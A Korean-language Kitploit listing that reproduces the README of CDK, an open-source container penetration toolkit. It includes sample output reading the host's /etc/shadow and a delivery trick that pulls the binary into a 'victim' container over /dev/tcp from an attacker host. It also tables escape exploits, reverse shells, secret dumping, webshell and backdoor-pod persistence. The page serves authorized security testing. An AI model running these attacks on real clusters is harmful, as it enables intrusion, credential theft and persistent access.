Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CDK — 📦 K8s, Docker, Containerd의 보안 테스트를 더 쉽게 만듭니다. | Kitploit
도구/GitHubGitHub/cdk-team/cdk
Privilege EscalationReconnaissanceContainer SecurityPersistence MechanismsExploitationLateral MovementPost-ExploitationPenetration TestingCloud SecurityContainer Escape
GitHubcdk-team/cdk

CDK

4.7k6063개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

📦 K8s, Docker, Containerd의 보안 테스트를 더 쉽게 만듭니다.

저장소 보기웹사이트

CDK - 제로 의존성 컨테이너 침투 도구 키트

English | 简体中文

png

법적 고지

사전 동의 없이 CDK를 사용하여 대상을 공격하는 것은 불법입니다. CDK는 보안 테스트 목적으로만 사용해야 합니다.

개요

CDK는 오픈 소스 컨테이너 침투 도구 키트로, 다양한 경량 컨테이너에서 OS 종속성 없이 안정적인 익스플로잇을 제공하도록 설계되었습니다. 유용한 네트워크 도구와 강력한 PoC/EXP가 함께 제공되어 컨테이너를 탈출하고 K8s 클러스터를 쉽게 장악할 수 있도록 도와줍니다.

빠른 시작

cdk eva 를 실행하여 평가 정보와 권장 익스플로잇을 확인한 다음 cdk run 을 실행하여 공격을 시작하세요.

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

설치/전달

최신 릴리스를 https://github.com/cdk-team/CDK/releases/ 에서 다운로드하세요.

실행 파일을 대상 컨테이너에 넣고 테스트를 시작하세요.

팁: 실제 침투 테스트에서 대상 컨테이너에 CDK 전달하기

파일을 업로드할 수 있는 익스플로잇이 있다면 CDK 바이너리를 직접 업로드할 수 있습니다.

RCE 익스플로잇이 있지만 대상 컨테이너에 curl 또는 wget이 없는 경우 다음 방법을 사용하여 CDK를 전달할 수 있습니다:

  1. 먼저, 공인 IP가 있는 호스트에 CDK 바이너리를 호스팅합니다.
root@kitploit:~
(호스트에서)
nc -lvp 999 < cdk
  1. 피해자 컨테이너 내부에서 다음을 실행합니다.
root@kitploit:~
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

사용법

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

특징

CDK는 세 가지 모듈을 제공합니다:

  1. Evaluate: 컨테이너 내부 정보를 수집하여 잠재적 취약점을 찾습니다.
  2. Exploit: 컨테이너 탈출, 지속성 유지 및 측면 이동을 위한 익스플로잇
  3. Tool: TCP/HTTP 요청, 터널 및 K8s 클러스터 관리를 위한 네트워크 도구 및 API

Evaluate 모듈

사용법

root@kitploit:~
cdk evaluate [--full]

Exploit 모듈

사용 가능한 모든 익스플로잇 목록:

root@kitploit:~
cdk run --list

대상 익스플로잇 실행:

root@kitploit:~
cdk run <script-name> [options]

Thin 관련 참고: thin 릴리스는 서버리스 함수와 같이 수명이 짧은 컨테이너 셸을 위해 준비되었습니다. 소스 코드에 빌드 태그를 추가하고 일부 익스플로잇을 제외하여 바이너리를 더 가볍게 만들었습니다. 2MB 파일에는 CDK 기능의 90%가 포함되어 있으며, CDK 소스 코드에서 유용한 익스플로잇을 선택하여 자체 경량 바이너리를 빌드할 수도 있습니다.

Tool 모듈

Linux에서 명령어를 실행하는 것과 유사하지만 입력 인수가 약간 다릅니다. 사용법 링크를 참조하세요.

root@kitploit:~
cdk nc [options]
cdk ps

릴리스 문서

새 버전 릴리스 방법, thin 버전 생성 방식, upx 버전을 제공하는 이유, all/normal/thin/upx 버전 간의 차이점, 특정 CDK 익스플로잇과 도구를 선택하여 자신만의 릴리스를 컴파일하는 방법을 알아보려면 릴리스 문서를 확인하세요.

개발자 문서

  • 컨테이너 내 테스트 실행.

CDK에 기여하기

먼저, 시간을 내어 기여해 주셔서 감사합니다!

다음 기여자분들께 감사드립니다:

더 많은 기여자: 기여자 목록

버그 신고

버그는 GitHub Issues로 추적됩니다. 현재 CDK 버전, 오류 메시지 및 환경과 함께 이슈를 생성해 주세요. 문제를 재현할 수 있는 정확한 단계를 설명해 주세요.

개선 제안

개선 제안은 GitHub Discussions로 추적됩니다. 여기에 의견을 게시하여 개발자와 직접 논의할 수 있습니다.

Pull Requests

문제를 수정하거나 CDK의 품질을 유지하려면:

  • 현재 CDK 버전, 환경, 문제 및 문제를 재현하는 정확한 단계를 설명해 주세요.
  • 문제 수정 전후의 실행 스크린샷 또는 로그를 포함해 주세요.

새로운 기능 또는 익스플로잇:

  • 이 개선 사항이 다른 사용자에게 왜 유용한지 설명해 주세요.
  • 기여 내용을 검토할 수 있는 지속 가능한 환경을 제공해 주세요.
  • 새 기능이 어떻게 작동하는지 보여주는 스크린샷을 포함해 주세요.
  • 새로운 evaluate/exploit 스크립트를 커밋하는 경우 PR 메시지에 간단한 문서를 추가해 주세요. 예시는 여기를 참조하세요.

이벤트

404StarLink 2.0 - Galaxy

png

CDK 프로젝트는 현재 404Team Starlink Project 2.0에 포함되어 있습니다. StarLink 커뮤니티에 가입하여 CDK 개발팀과 소통하세요.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
도구 다운로드
전술스크립트지원사용법/예제
정보 수집OS 기본 정보✔link
정보 수집사용 가능한 Capabilities✔link
정보 수집사용 가능한 Linux 명령어✔link
정보 수집마운트✔link
정보 수집Net 네임스페이스✔link
정보 수집민감한 ENV✔link
정보 수집민감한 프로세스✔link
정보 수집민감한 로컬 파일✔link
정보 수집Kube-proxy Route Localnet(CVE-2020-8558)✔link
정보 수집DNS 기반 서비스 디스커버리✔link
디스커버리K8s Api-server 정보✔link
디스커버리K8s Service-account 정보✔link
디스커버리클라우드 제공자 Metadata API✔link
전술기술CDK 익스플로잇 이름지원Thin 지원문서
탈출docker-runc CVE-2019-5736runc-pwn✔✔
탈출containerd-shim CVE-2020-15257shim-pwn✔link
탈출docker.sock PoC (DIND 공격)docker-sock-check✔✔link
탈출docker.sock RCEdocker-sock-pwn✔✔link
탈출Docker API(2375) RCEdocker-api-pwn✔✔link
탈출디바이스 마운트 탈출mount-disk✔✔link
탈출LXCFS 탈출lxcfs-rw✔✔link
탈출Cgroups 탈출mount-cgroup✔✔link
탈출권한 없는 사용자 네임스페이스 남용 탈출 CVE-2022-0492abuse-unpriv-userns✔✔link
탈출Procfs 탈출mount-procfs✔✔link
탈출Ptrace 탈출 PoCcheck-ptrace✔✔link
탈출Cgroup(devices.allow) 재작성rewrite-cgroup-devices✔✔link
탈출호스트 시스템에서 임의 파일 읽기 (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔link
디스커버리K8s 컴포넌트 프로브service-probe✔✔link
디스커버리Istio Sidecar 메타 덤프istio-check✔✔link
디스커버리K8s Pod 보안 정책 덤프k8s-psp-dump✔link
원격 제어리버스 쉘reverse-shell✔✔link
원격 제어Kubelet Execkubelet-exec✔✔
자격 증명 접근레지스트리 무차별 대입registry-brute✔✔link
자격 증명 접근액세스 키 스캐닝ak-leakage✔✔link
자격 증명 접근Etcd에서 K8s 토큰 가져오기etcd-get-k8s-token✔✔
자격 증명 접근K8s 시크릿 덤프k8s-secret-dump✔✔link
자격 증명 접근K8s Config 덤프k8s-configmap-dump✔✔link
권한 상승K8s RBAC 우회k8s-get-sa-token✔✔link
권한 상승CVE-2026-31431 copy-fail (non-root→root & x86_64 전용)copy-fail-cve-2026-31431✔link
지속성WebShell 배포webshell-deploy✔✔link
지속성백도어 Pod 배포k8s-backdoor-daemonset✔✔link
지속성섀도우 K8s api-server 배포k8s-shadow-apiserver✔link
지속성K8s MITM 공격 (CVE-2020-8554)k8s-mitm-clusterip✔✔link
지속성K8s CronJob 배포k8s-cronjob✔✔link
명령어설명지원사용법/예제
ncTCP 터널✔link
ps프로세스 정보✔link
netstat"netstat -antup" 명령어와 유사✔
ifconfig네트워크 정보✔link
vi파일 편집✔link
ectlectd 키 무단 열거✔
kcurlK8s api-server에 요청✔link
dcurlDocker HTTP API에 요청✔link
ucurlDocker Unix 소켓에 요청✔link
rcurlDocker Registry API에 요청
probeIP/포트 스캐닝✔link